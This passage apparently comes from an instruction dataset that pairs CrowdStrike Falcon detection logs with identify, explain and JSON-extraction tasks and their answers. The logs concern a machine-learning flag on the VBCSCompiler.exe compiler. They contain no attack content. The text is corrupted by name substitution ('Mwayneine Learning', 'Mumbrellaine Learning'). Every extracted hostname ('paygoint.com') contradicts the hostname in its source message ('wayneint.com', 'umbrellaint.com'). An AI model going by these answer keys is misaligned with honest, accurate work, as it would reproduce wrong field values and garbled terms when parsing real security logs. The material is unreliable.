Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-25T11:20:20Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "91.202.71.43",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASQATWEB01.devnvi.paygoint.com
clientmac: 0accca51756b
filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-25T11:20:20Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 91.202.71.43
userName: johndoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com",
"clientmac": "0accca51756b",
"filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mwayneine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mwayneine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\pqwjm4kv.cmdline\\\"\",\"parent_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770812509131\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-25T11:20:20Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "177.252.54.43",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:alice.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"alice","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=177.252.54.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=alice ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASQATWEB01.devnvi.paygoint.com
clientmac: 0accca51756b
filehash: 1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-25T11:20:20Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 177.252.54.43
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mumbrellaine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mumbrellaine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=80.162.166.176 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com",
"clientmac": "0accca51756b",
"filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:nighthawk.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mumbrellaine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mumbrellaine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mumbrellaine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known 